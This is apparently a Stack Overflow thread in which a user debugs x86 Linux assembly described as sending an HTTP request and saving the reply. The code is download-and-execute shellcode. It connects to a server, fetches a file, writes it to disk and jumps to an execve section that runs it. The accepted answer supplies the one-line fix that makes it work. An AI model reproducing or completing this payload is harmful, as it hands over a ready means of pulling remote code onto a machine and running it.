# Sending an HTTP request and receiving output. x86 Linux assembly

Tags: linux, http, assembly, x86

I've been working on getting this assembly code to work for hours now. I've searched every possible article I could find.

```
.section .text
.global _start
_start:

            push $0x66
            popl %eax
            cdq
            pushl $0x1
            popl %ebx
            pushl %edx
            pushl %ebx
    pushl $0x2
            movl %esp, %ecx
            int $0x80

    popl %ebx
            popl %esi

    pushl $0xdeadbeef # replace with inet_addr() result

            movl $0xaffffffd, %ebp # ~(0080|AF_INET)
    not %ebp
    pushl %ebp

            incl %ebx
            pushl $0x10
            pushl %ecx
            pushl %eax
            movb $0x66, %al

    movl %esp, %ecx
            int $0x80

    popl %edi

_open_file:

    movb $0x8, %al
    pushl %edx
    pushl $0x41
    movl %esp, %ebx
    pushl %eax
    popl %ecx
    int $0x80

    xchg %eax, %esi
    xchg %ebx, %edi

_gen_http_request:

    #
    # < use gen_httpreq.c, to generate a HTTP GET request. >
    #

_gen_http_eof:

    movb $0x4, %al

_send_http_request:

    movl %esp, %ecx
    int $0x80

    cdq
    incl %edx

_wait_for_dbl_crlf:

    decl %ecx
    movb $0x3, %al
    int $0x80
    cmpl $0x0d0a0d0a, (%ecx)
    jne _wait_for_dbl_crlf

_pre_dump_loop:

    movb $0x4, %dl

_dump_loop_do_read:

    movb $0x3, %al
    clc

_dump_loop_do_write:

    int $0x80
    xchg %ebx, %esi
    jc _dump_loop_do_read
    test %eax, %eax
    jz _close_file
    movb $0x4, %al
    stc
    jmp _dump_loop_do_write

_close_file:

    movb $0x6, %al
    int $0x80

_execve_file:

    cdq
    movb $0xb, %al
    movl %edi, %ebx
    pushl %edx
    pushl %ebx
    jmp _send_http_request
```

I've used the `gen_httpreq.c` to generate the HTTP request sent to the server.

My issue seems to be that the socket is never established. I watch the netstat output and when I execute the code above I don't get any connections at all. I'm curious if there's a specific way to do this.

Also, I've tried running netcat and listening on port 80 in another shell just to see if netstat wasn't picking up the connection, but nothing ever came through.

Here is my HTTP request.

```
pushl $0x0d0a0d0a
pushl $0x2f312e30
pushl $0x48545450
pushl $0x696c6520
pushl $0x2f2f2f66
pushl $0x47455420
```

When I execute it under `strace`, I get:

```
execve("./ht", ["./ht"], [/* 19 vars */]) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(8081), sin_addr=inet_addr("127.0.0.1")}, 16) = 0
write(3, "", 0) = 0
read(3, 0xffc59c8c, 1) = ? ERESTARTSYS (To be restarted if SA_RESTART is set)
```

It just hangs and seems to do nothing at all.

---

If there is another way to download the file like this, for example, sending the HTTP request and then reading the output from that request.

So essentially I would do:
`./download > newfile`

I couldn't find anything else about this topic as it's pretty minimal.
Thanks for any help!

Comment: Use `strace` and a debugger.

Comment: syscall_4294967043(0x3, 0xffa8ae31, 0x1, 0x100007f, 0, 0x911f0002) = -1 (errno 38)
I am getting this. It happens a ton of times

Comment: Check the first sign of trouble. These are just consequence because you don't properly set up `eax`.

Comment: execve("./ht", ["./ht"], [/* 19 vars */]) = 0

socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3

connect(3, {sa_family=AF_INET, sin_port=htons(8081), sin_addr=inet_addr("127.0.0.1")}, 16) = 0
write(3, "", 0)                         = 0
read(3, 0xffc59c8c, 1)                  = ? ERESTARTSYS (To be restarted if SA_RESTART is set)

Comment: It executes, connects, and then hangs

Comment: Okay so now check why you have a write of 0 bytes.

Comment: How do I check this?

Comment: Use a debugger and comment your code.

Comment: I'm sorry, I'm not very educated at all on the subject. Would I just add a comment to every line and see where the issue is?

Comment: Yeah, commenting your code will help you notice when it actually does something other than what the comment for that line is hoping.  You do need to use a debugger to single-step through it.  See [the x86 tag wiki](http://stackoverflow.com/tags/x86/info) for example.

Comment: I edited your `strace` output into your question, where it can be formatted properly instead of mashed together with no line breaks.  Please do that yourself for any future updates.

Answer (score 5):

I have figured out what the issue was. When you use the program to generate the HTTP request, it returns all of the pushl's, but not the necessary movb at the end.

I added movb $0x14,%dl and it worked perfectly

Comment: I would love to understand what is all these about... one day maybe I do :)